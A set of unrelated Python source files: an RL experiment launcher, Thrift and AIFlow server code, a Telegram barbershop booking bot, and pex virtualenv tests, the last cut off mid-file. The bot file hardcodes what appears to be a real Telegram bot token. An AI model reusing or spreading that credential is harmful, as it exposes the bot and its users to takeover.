'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method prediction-guided '\
'--num-weight-candidates 7 '\
'--num-tasks 6 '\
'--sparsity 1.0 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pgmorl/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_ra:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method ra '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/ra/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_random:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method random '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/random/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_pfa:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method pfa '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pfa/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_moead:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method moead '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/moead/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
TProcessPoolServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import collections
from multiprocessing import Process, Value, Condition, reduction
from .TServer import TServer
from thrift.transport.TTransport import TTransportException
from thrift.protocol.THeaderProtocol import THeaderProtocolFactory
class TProcessPoolServer(TServer):
"""
Server with a fixed size pool of worker subprocesses which service requests.
Note that if you need shared state between the handlers - it's up to you!
Written by Dvir Volk, doat.com
"""
def __init__(self, * args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
if not isinstance(callback, collections.Callable):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop around getting clients from the shared queue and
process them."""
if self.postForkCallback:
self.postForkCallback()
while self.isRunning.value == True:
try:
client = self.serverTransport.accept()
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
except Exception as x:
logging.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
if isinstance(self.inputProtocolFactory, THeaderProtocolFactory):
oprot = iprot
else:
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransportException as tx:
pass
except Exception as x:
logging.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start a fixed number of worker threads and put client into a queue"""
# this is a shared state that can tell the workers to exit when set
# as false
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
except Exception as x:
logging.exception(x)
#wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
except Exception as x:
logging.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
|
server.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import asyncio
import functools
import inspect
import os
import sys
import tempfile
import threading
import time
from concurrent import futures
import logging
import grpc
from grpc import _common, _server
from grpc._cython.cygrpc import StatusCode
from grpc._server import _serialize_response, _status, _abort, _Context, _unary_request, \
_select_thread_pool_for_behavior, _unary_response_in_pool
from typing import Dict
from notification_service.service import NotificationService
from ai_flow.protobuf.high_availability_pb2_grpc import add_HighAvailabilityManagerServicer_to_server
from ai_flow.endpoint.server.high_availability import SimpleAIFlowServerHaManager, HighAvailableService
from ai_flow.store.db.base_model import base
from ai_flow.store.sqlalchemy_store import SqlAlchemyStore
from ai_flow.store.mongo_store import MongoStore, MongoStoreConnManager
from ai_flow.store.db.db_util import extract_db_engine_from_uri, parse_mongo_uri
from ai_flow.endpoint.server.server_config import DBType
from notification_service.proto import notification_service_pb2_grpc
from ai_flow.metadata_store.service.service import MetadataService
from ai_flow.model_center.service.service import ModelCenterService
from ai_flow.metric.service.metric_service import MetricService
from ai_flow.scheduler.scheduler_service import SchedulerService, SchedulerServiceConfig
sys.path.append(os.path.abspath(os.path.join(os.getcwd(), "../../..")))
from ai_flow.protobuf import model_center_service_pb2_grpc, \
metadata_service_pb2_grpc, metric_service_pb2_grpc, scheduling_service_pb2_grpc
_PORT = '50051'
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
class AIFlowServer(object):
"""
Block/Async server of an AIFlow Rest Endpoint that provides Metadata/Model/Notification function service.
"""
def __init__(self, store_uri=None, port=_PORT,
start_default_notification: bool = True,
notification_uri=None,
start_meta_service: bool = True,
start_model_center_service: bool = True,
start_metric_service: bool = True,
start_scheduler_service: bool = True,
scheduler_service_config: Dict = None,
enabled_ha: bool = False,
ha_manager=None,
ha_server_uri=None,
ha_storage=None,
ttl_ms: int = 10000):
self.store_uri = store_uri
self.db_type = DBType.value_of(extract_db_engine_from_uri(store_uri))
self.executor = Executor(futures.ThreadPoolExecutor(max_workers=10))
self.server = grpc.server(self.executor)
self.start_default_notification = start_default_notification
self.enabled_ha = enabled_ha
server_uri = 'localhost:{}'.format(port)
if start_default_notification:
logging.info("start default notification service.")
notification_service_pb2_grpc.add_NotificationServiceServicer_to_server(
NotificationService.from_storage_uri(store_uri),
self.server)
if start_model_center_service:
logging.info("start model center service.")
model_center_service_pb2_grpc.add_ModelCenterServiceServicer_to_server(
ModelCenterService(store_uri=store_uri,
notification_uri=server_uri if start_default_notification
and notification_uri is None else notification_uri),
self.server)
if start_meta_service:
logging.info("start meta service.")
metadata_service_pb2_grpc.add_MetadataServiceServicer_to_server(
MetadataService(db_uri=store_uri, server_uri=server_uri), self.server)
if start_metric_service:
logging.info("start metric service.")
metric_service_pb2_grpc.add_MetricServiceServicer_to_server(MetricService(db_uri=store_uri), self.server)
if start_scheduler_service:
self._add_scheduler_service(scheduler_service_config)
if enabled_ha:
self._add_ha_service(ha_manager, ha_server_uri, ha_storage, store_uri, ttl_ms)
self.server.add_insecure_port('[::]:' + str(port))
def _add_scheduler_service(self, scheduler_service_config):
logging.info("start scheduler service.")
# check the `scheduler` option of scheduler service config
if scheduler_service_config is None:
raise Exception(
'The `scheduler` option of scheduler service config is not configured. '
'Please add the `scheduler` option!')
if 'scheduler_class_name' not in scheduler_service_config:
raise Exception(
'The `scheduler_class_name` option of scheduler service config is not configured. '
'Please add the `scheduler_class_name` option under the `scheduler` option!')
if 'scheduler_config' not in scheduler_service_config:
scheduler_service_config['scheduler_config'] = {}
real_config = SchedulerServiceConfig()
real_config.set_scheduler_config(scheduler_service_config.get('scheduler_config'))
real_config.set_repository(scheduler_service_config.get('repository'))
real_config.set_scheduler_class_name(scheduler_service_config.get('scheduler_class_name'))
self.scheduler_service = SchedulerService(real_config)
scheduling_service_pb2_grpc.add_SchedulingServiceServicer_to_server(self.scheduler_service,
self.server)
def _add_ha_service(self, ha_manager, ha_server_uri, ha_storage, store_uri, ttl_ms):
if ha_manager is None:
ha_manager = SimpleAIFlowServerHaManager()
if ha_server_uri is None:
raise ValueError("ha_server_uri is required with ha enabled!")
if ha_storage is None:
db_engine = extract_db_engine_from_uri(store_uri)
if DBType.value_of(db_engine) == DBType.MONGODB:
username, password, host, port, db = parse_mongo_uri(store_uri)
ha_storage = MongoStore(host=host,
port=int(port),
username=username,
password=password,
db=db)
else:
ha_storage = SqlAlchemyStore(store_uri)
self.ha_service = HighAvailableService(ha_manager, ha_server_uri, ha_storage, ttl_ms)
add_HighAvailabilityManagerServicer_to_server(self.ha_service, self.server)
def run(self, is_block=False):
if self.enabled_ha:
self.ha_service.start()
self.server.start()
logging.info('AIFlow server started.')
if is_block:
try:
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
self.stop()
else:
pass
def stop(self, clear_sql_lite_db_file=False):
self.executor.shutdown()
self.server.stop(0)
if self.enabled_ha:
self.ha_service.stop()
if self.db_type == DBType.SQLITE and clear_sql_lite_db_file:
store = SqlAlchemyStore(self.store_uri)
base.metadata.drop_all(store.db_engine)
os.remove(self.store_uri[10:])
elif self.db_type == DBType.MONGODB:
MongoStoreConnManager().disconnect_all()
logging.info('AIFlow server stopped.')
def _clear_db(self):
if self.db_type == DBType.SQLITE:
store = SqlAlchemyStore(self.store_uri)
base.metadata.drop_all(store.db_engine)
base.metadata.create_all(store.db_engine)
elif self.db_type == DBType.MONGODB:
MongoStoreConnManager().drop_all()
def _loop(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
if not loop.is_running() or loop.is_closed():
loop.run_forever()
pending = asyncio.all_tasks(loop=loop)
if pending:
loop.run_until_complete(asyncio.gather(*pending))
class Executor(futures.Executor):
def __init__(self, thread_pool, loop=None):
super().__init__()
self._shutdown = False
self._thread_pool = thread_pool
self._loop = loop or asyncio.get_event_loop()
if not self._loop.is_running() or self._loop.is_closed():
self._thread = threading.Thread(target=_loop, args=(self._loop,), daemon=True)
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new futures after shutdown.')
if not self._loop.is_running():
raise RuntimeError('Loop must be started before any function could be submitted.')
if inspect.iscoroutinefunction(fn):
coroutine = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coroutine, self._loop)
else:
func = functools.partial(fn, *args, **kwargs)
return self._loop.run_in_executor(self._thread_pool, func)
def shutdown(self, wait=True):
self._shutdown = True
if wait:
self._thread_pool.shutdown()
async def _call_behavior_async(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return await behavior(argument, context), True
except Exception as e:
with state.condition_type:
if e not in state.rpc_errors:
logging.exception(e)
_abort(state, rpc_event.operation_call, StatusCode.unknown, _common.encode(e))
return None, False
async def _unary_response_in_pool_async(rpc_event, state, behavior, argument_thunk, request_deserializer,
response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = await _call_behavior_async(rpc_event, state, behavior, argument, request_deserializer)
if proceed:
serialized_response = _serialize_response(rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _handle_unary_unary(rpc_event, state, method_handler, default_thread_pool):
unary_request = _unary_request(rpc_event, state, method_handler.request_deserializer)
thread_pool = _select_thread_pool_for_behavior(method_handler.unary_unary, default_thread_pool)
if asyncio.iscoroutinefunction(method_handler.unary_unary):
return thread_pool.submit(_unary_response_in_pool_async, rpc_event, state, method_handler.unary_unary,
unary_request, method_handler.request_deserializer,
method_handler.response_serializer)
else:
return thread_pool.submit(_unary_response_in_pool, rpc_event, state, method_handler.unary_unary, unary_request,
method_handler.request_deserializer, method_handler.response_serializer)
_server._handle_unary_unary = _handle_unary_unary
if __name__ == '__main__':
fd, temp_db_file = tempfile.mkstemp()
os.close(fd)
store_uri = '%s%s' % ('sqlite:///', temp_db_file)
server = AIFlowServer(store_uri=store_uri)
server.run(is_block=True)
|
main.py
|
from multiprocessing.context import Process
from threading import Thread
import schedule
import telebot
import time
from db import dbstart, db_update, isNewClient, columnLists
from manageControl import new_user, mainmenu, barber_list, select_barber, select_day, select_time, new_order, waiting, \
set_mark, add_mark_to_db, history_menu, instructions
bot = telebot.TeleBot('2120063146:AAGFdvPdx22l_DvrW4xejLaM7YUNvQwbyAc')
class ScheduleUpdate():
def try_update_db(self):
schedule.every().day.at("07:00").do(p.schedule_update)
while True:
schedule.run_pending()
time.sleep(1)
def schedule_update(self):
db_update()
def start_process(self): # Запуск Process
Thread(target=self.try_update_db, args=()).start()
@bot.message_handler(commands=['start'])
def start_messages(message):
chatid = message.chat.id
if isNewClient(chatid):
new_user(chatid)
else:
mainmenu(chatid)
@bot.message_handler(content_types=['text'])
def get_text_messages(message):
bot.send_message(message.from_user.id, "Привет, " + message.text)
@bot.callback_query_handler(func=lambda message: True)
def answer(message):
chatid = message.message.chat.id
barber_id = None
time = None
if message.data == 'price_list':
try:
barber_list(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif message.data == 'to_main_menu':
try:
mainmenu(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif message.data == 'back_to_welcome':
try:
new_user(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif message.data == 'new_haircut':
try:
select_barber(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'barber_' in message.data:
try:
barber_id = message.data[-1]
select_day(chatid, message.message.message_id, barber_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'date_' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("_date_", "_")
select_time(chatid, message.message.message_id, info_str)
print(info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'time_' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("_time_", " ")
print(info_str)
new_order(chatid, message.message.message_id, info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'to_waiting' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("to_waiting_", "")
waiting(chatid, message.message.message_id, info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'to_mark' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("to_mark_", "")
set_mark(chatid, message.message.message_id, info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif '_marked_' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("_marked_", "_")
add_mark_to_db(chatid, message.message.message_id, info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'history' in message.data:
try:
history_menu(chatid, message.message.message_id)
columnLists("Orders")
except Exception as e:
print(message.data + ' Error: ', e)
elif 'instructions' in message.data:
try:
instructions(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
if __name__ == '__main__':
dbstart()
p = ScheduleUpdate()
p.start_process()
#columnLists("Orders")
try:
bot.polling(none_stop=True, interval=0)
except Exception as e:
print(' Error: ', e)
|
test_venv.py
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import
import errno
import multiprocessing
import os
import shutil
import subprocess
import sys
import tempfile
from subprocess import CalledProcessError
from textwrap import dedent
import pytest
from pex.common import safe_mkdtemp, safe_open, temporary_dir, touch
from pex.compatibility import PY2
from pex.executor import Executor
from pex.interpreter import PythonInterpreter
from pex.pex_builder import CopyMode, PEXBuilder
from pex.testing import IS_PYPY, PY38, PY_VER, ensure_python_interpreter, run_pex_command
from pex.tools.commands.virtualenv import Virtualenv
from pex.typing import TYPE_CHECKING, cast
from pex.util import named_temporary_file
if TYPE_CHECKING:
from typing import Any, Dict, Iterable, Iterator, List, Optional, Protocol, Set, Text, Tuple
class CreatePexVenv(Protocol):
def __call__(self, *options):
# type: (*str) -> Virtualenv
pass
FABRIC_VERSION = "2.5.0"
@pytest.fixture(scope="module")
def pex():
# type: () -> Iterator[str]
with temporary_dir() as tmpdir:
pex_path = os.path.join(tmpdir, "fabric.pex")
src_dir = os.path.join(tmpdir, "src")
touch(os.path.join(src_dir, "user/__init__.py"))
touch(os.path.join(src_dir, "user/package/__init__.py"))
# N.B.: --unzip just speeds up runs 2+ of the pex file and is otherwise not relevant to
# these tests.
run_pex_command(
args=[
"fabric=={}".format(FABRIC_VERSION),
"-c",
"fab",
"--sources-directory",
src_dir,
"-o",
pex_path,
"--include-tools",
]
)
yield os.path.realpath(pex_path)
def make_env(**kwargs):
# type: (**Any) -> Dict[str, str]
env = os.environ.copy()
env.update((k, str(v)) for k, v in kwargs.items())
return env
@pytest.fixture
def create_pex_venv(pex):
# type: (str) -> Iterator[CreatePexVenv]
with temporary_dir() as tmpdir:
venv_dir = os.path.join(tmpdir, "venv")
def _create_pex_venv(*options):
# type: (*str) -> Virtualenv
subprocess.check_call(
args=[pex, "venv", venv_dir] + list(options or ()), env=make_env(PEX_TOOLS="1")
)
return Virtualenv(venv_dir)
yield _create_pex_venv
def test_force(create_pex_venv):
# type: (CreatePexVenv) -> None
venv = create_pex_venv("--pip")
venv.interpreter.execute(args=["-m", "pip", "install", "ansicolors==1.1.8"])
venv.interpreter.execute(args=["-c", "import colors"])
with pytest.raises(CalledProcessError):
create_pex_venv()
venv_force = create_pex_venv("--force")
# The re-created venv should have no ansicolors installed like the prior venv.
with pytest.raises(Executor.NonZeroExit):
venv_force.interpreter.execute(args=["-c", "import colors"])
# The re-created venv should have no pip installed either.
with pytest.raises(Executor.NonZeroExit):
venv.interpreter.execute(args=["-m", "pip", "install", "ansicolors==1.1.8"])
def execute_venv_pex_interpreter(
venv, # type: Virtualenv
code=None, # type: Optional[str]
extra_args=(), # type: Iterable[str]
**extra_env # type: Any
):
# type: (...) -> Tuple[int, Text, Text]
process = subprocess.Popen(
args=[venv.join_path("pex")] + list(extra_args),
env=make_env(PEX_INTERPRETER=True, **extra_env),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
stdout, stderr = process.communicate(input=None if code is None else code.encode())
return process.returncode, stdout.decode("utf-8"), stderr.decode("utf-8")
def expected_file_path(
venv, # type: Virtualenv
package, # type: str
):
# type: (...) -> str
return os.path.realpath(
os.path.join(
venv.site_packages_dir,
os.path.sep.join(package.split(".")),
"__init__.{ext}".format(ext="pyc" if venv.interpreter.version[0] == 2 else "py"),
)
)
def parse_fabric_version_output(output):
# type: (Text) -> Dict[Text, Text]
return dict(cast("Tuple[Text, Text]", line.split(" ", 1)) for line in output.splitlines())
def test_venv_pex(create_pex_venv):
# type: (CreatePexVenv) -> None
venv = create_pex_venv()
venv_pex = venv.join_path("pex")
fabric_output = subprocess.check_output(args=[venv_pex, "-V"])
# N.B.: `fab -V` output looks like so:
# $ fab -V
# Fabric 2.5.0
# Paramiko 2.7.2
# Invoke 1.4.1
versions = parse_fabric_version_output(fabric_output.decode("utf-8"))
assert FABRIC_VERSION == versions["Fabric"]
invoke_version = "Invoke {}".format(versions["Invoke"])
invoke_script_output = subprocess.check_output(
args=[venv_pex, "-V"], env=make_env(PEX_SCRIPT="invoke")
)
assert invoke_version == invoke_script_output.decode("utf-8").strip()
invoke_entry_point_output = subprocess.check_output(
args=[venv_pex, "-V"],
env=make_env(PEX_MODULE="invoke.main:program.run"),
)
assert invoke_version == invoke_entry_point_output.decode("utf-8").strip()
pex_extra_sys_path = ["/dev/null", "Bob"]
returncode, _, stderr = execute_venv_pex_interpreter(
venv,
code=dedent(
"""\
from __future__ import print_function
import os
import sys
def assert_equal(test_num, expected, actual):
if expected == actual:
return
print(
"[{{}}] Expected {{}} but got {{}}".format(test_num, expected, actual),
file=sys.stderr,
)
sys.exit(test_num)
assert_equal(1, {pex_extra_sys_path!r}, sys.path[-2:])
import fabric
assert_equal(2, {fabric!r}, os.path.realpath(fabric.__file__))
import user.package
assert_equal(3, {user_package!r}, os.path.realpath(user.package.__file__))
""".format(
pex_extra_sys_path=pex_extra_sys_path,
fabric=expected_file_path(venv, "fabric"),
user_package=expected_file_path(venv, "user.package"),
)
),
PEX_EXTRA_SYS_PATH=os.pathsep.join(pex_extra_sys_path),
)
assert 0 == returncode, stderr
def test_binary_path(create_pex_venv):
# type: (CreatePexVenv) -> None
code = dedent(
"""\
import errno
import subprocess
import sys
# PEXed code should be able to find all (console) scripts on the $PATH when the venv is
# created with --bin-path set, and the scripts should all run with the venv interpreter in
# order to find their code.
def try_invoke(*args):
try:
subprocess.check_call(list(args))
return 0
except OSError as e:
if e.errno == errno.ENOENT:
# This is what we expect when scripts are not set up on PATH via --bin-path.
return 1
return 2
exit_code = try_invoke("fab", "-V")
exit_code += 10 * try_invoke("inv", "-V")
exit_code += 100 * try_invoke("invoke", "-V")
sys.exit(exit_code)
"""
)
venv = create_pex_venv()
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, code=code, PATH=tempfile.gettempdir()
)
assert 111 == returncode, stdout + stderr
venv_bin_path = create_pex_venv("-f", "--bin-path", "prepend")
returncode, _, _ = execute_venv_pex_interpreter(
venv_bin_path, code=code, PATH=tempfile.gettempdir()
)
assert 0 == returncode
def test_venv_pex_interpreter_special_modes(create_pex_venv):
# type: (CreatePexVenv) -> None
venv = create_pex_venv()
# special mode execute module: -m module
returncode, stdout, stderr = execute_venv_pex_interpreter(venv, extra_args=["-m"])
assert 2 == returncode, stderr
assert "" == stdout
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, extra_args=["-m", "fabric", "--version"]
)
assert 0 == returncode, stderr
versions = parse_fabric_version_output(stdout)
assert FABRIC_VERSION == versions["Fabric"]
# special mode execute code string: -c <str>
returncode, stdout, stderr = execute_venv_pex_interpreter(venv, extra_args=["-c"])
assert 2 == returncode, stderr
assert "" == stdout
fabric_file_code = "import fabric, os; print(os.path.realpath(fabric.__file__))"
expected_fabric_file_path = expected_file_path(venv, "fabric")
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, extra_args=["-c", fabric_file_code]
)
assert 0 == returncode, stderr
assert expected_fabric_file_path == stdout.strip()
# special mode execute stdin: -
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, code=fabric_file_code, extra_args=["-"]
)
assert 0 == returncode, stderr
assert expected_fabric_file_path == stdout.strip()
# special mode execute python file: <py file name>
with named_temporary_file(prefix="code", suffix=".py", mode="w") as fp:
fp.write(fabric_file_code)
fp.close()
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, code=fabric_file_code, extra_args=[fp.name]
)
assert 0 == returncode, stderr
assert expected_fabric_file_path == stdout.strip()
@pytest.mark.parametrize(
"start_method", getattr(multiprocessing, "get_all_start_methods", lambda: [None])()
)
def test_venv_multiprocessing_issues_1236(
tmpdir, # type: Any
start_method, # type: Optional[str]
):
# type: (...) -> None
src = os.path.join(str(tmpdir), "src")
with safe_open(os.path.join(src, "foo.py"), "w") as fp:
fp.write(
dedent(
"""\
def bar():
print('hello')
"""
)
)
with safe_open(os.path.join(src, "main.py"), "w") as fp:
fp.write(
dedent(
"""\
import multiprocessing
from foo import bar
if __name__ == '__main__':
if {start_method!r}:
multiprocessing.set_start_method({start_method!r})
p = multiprocessing.Process(target=bar)
p.start()
""".format(
start_method=start_method
)
)
)
pex_file = os.path.join(str(tmpdir), "mp.pex")
result = run_pex_command(args=["-D", src, "-m", "main", "-o", pex_file, "--include-tools"])
result.assert_success()
# Confirm multiprocessing works via normal PEX file execution.
output = subprocess.check_output(args=[pex_file])
assert "hello" == output.decode("utf-8").strip()
# Confirm multiprocessing works via the `pex` venv script.
venv = os.path.join(str(tmpdir), "venv")
subprocess.check_call(args=[pex_file, "venv", venv], env=make_env(PEX_TOOLS=True))
output = subprocess.check_output(args=[os.path.join(venv, "pex")])
assert "hello" == output.decode("utf-8").strip()
def test_venv_symlinked_source_issues_1239(tmpdir):
# type: (Any) -> None
src = os.path.join(str(tmpdir), "src")
main = os.path.join(src, "main.py")
with safe_open(main, "w") as fp:
fp.write("import sys; sys.exit(42)")
pex_builder = PEXBuilder(copy_mode=CopyMode.SYMLINK)
pex_builder.set_executable(main)
pex_file = os.path.join(str(tmpdir), "a.pex")
pex_builder.build(pex_file, bytecode_compile=False)
assert 42 == subprocess.Popen(args=[pex_file]).wait()
venv = os.path.join(str(tmpdir), "a.venv")
subprocess.check_call(
args=[sys.executable, "-m", "pex.tools", pex_builder.path(), "venv", venv]
)
venv_pex = os.path.join(venv, "pex")
shutil.rmtree(src)
assert 42 == subprocess.Popen(args=[venv_pex]).wait()
def test_venv_entrypoint_function_exit_code_issue_1241(tmpdir):
# type: (Any) -> None
pex_file = os.path.join(str(tmpdir), "ep-function.pex")
src = os.path.join(str(tmpdir), "src")
with safe_open(os.path.join(src, "module.py"), "w") as fp:
fp.write(
dedent(
"""\
import sys
def target():
args = sys.argv[1:]
if args:
exit = args[0]
try:
return int(exit)
except ValueError:
return exit
"""
)
)
result = run_pex_command(
args=["-D", src, "-e", "module:target", "--include-tools", "-o", pex_file]
)
result.assert_success()
venv = os.path.join(str(tmpdir), "ep-function.venv")
subprocess.check_call(args=[pex_file, "venv", venv], env=make_env(PEX_TOOLS=1))
venv_pex = os.path.join(venv, "pex")
assert 0 == subprocess.Popen(args=[venv_pex]).wait()
def assert_venv_process(
args, # type: List[str]
expected_returncode, # type: int
expected_stdout="", # type: str
expected_stderr="", # type: str
):
# type: (...) -> None
process = subprocess.Popen(
args=[venv_pex] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
stdout, stderr = process.communicate()
assert expected_returncode == process.returncode
assert expected_stdout == stdout.decode("utf-8")
assert expected_stderr == stderr.decode("utf-8")
assert_venv_process(args=["bob"], expected_returncode=1, expected_stderr="bob\n")
assert_venv_process(args=["42"], expected_returncode=42)
def test_venv_copies(tmpdir):
# type: (Any) -> None
python38 = ensure_python_interpreter(PY38)
pex_file = os.path.join(str(tmpdir), "venv.pex")
result = run_pex_command(args=["-o", pex_file, "--include-tools"], python=python38)
result.assert_success()
PEX_TOOLS = make_env(PEX_TOOLS=1)
venv_symlinks = os.path.join(str(tmpdir), "venv.symlinks")
subprocess.check_call(args=[python38, pex_file, "venv", venv_symlinks], env=PEX_TOOLS)
venv_symlinks_interpreter = PythonInterpreter.from_binary(
os.path.join(venv_symlinks, "bin", "python")
)
assert os.path.islink(venv_symlinks_interpreter.binary)
venv_copies = os.path.join(str(tmpdir), "venv.copies")
subprocess.check_call(args=[python38, pex_file, "venv", "--copies", venv_copies], env=PEX_TOOLS)
venv_copies_interpreter = PythonInterpreter.from_binary(
os.path.join(venv_copies, "bin", "python")
)
assert not os.path.islink(venv_copies_interpreter.binary)
def test_relocatable_venv(tmpdir):
# type: (Any) -> None
pex_file = os.path.join(str(tmpdir), "relocatable.pex")
src = os.path.join(str(tmpdir), "src")
with safe_open(os.path.join(src, "main.py"), "w") as fp:
fp.write(
dedent(
"""\
import sys
from colors import blue
print(blue(sys.executable))
"""
)
)
result = run_pex_command(
args=["-D", src, "ansicolors==1.1.8", "-m", "main", "--include-tools", "-o", pex_file]
)
result.assert_success()
venv = os.path.join(str(tmpdir), "relocatable.venv")
subprocess.check_call(args=[pex_file, "venv", venv], env=make_env(PEX_TOOLS=1))
subprocess.check_call(args=[os.path.join(venv, "pex")])
relocated_relpath = "relocated.venv"
relocated_venv = os.path.join(str(tmpdir), relocated_relpath)
# Since the venv pex script contains a shebang with an absolute path to the venv python
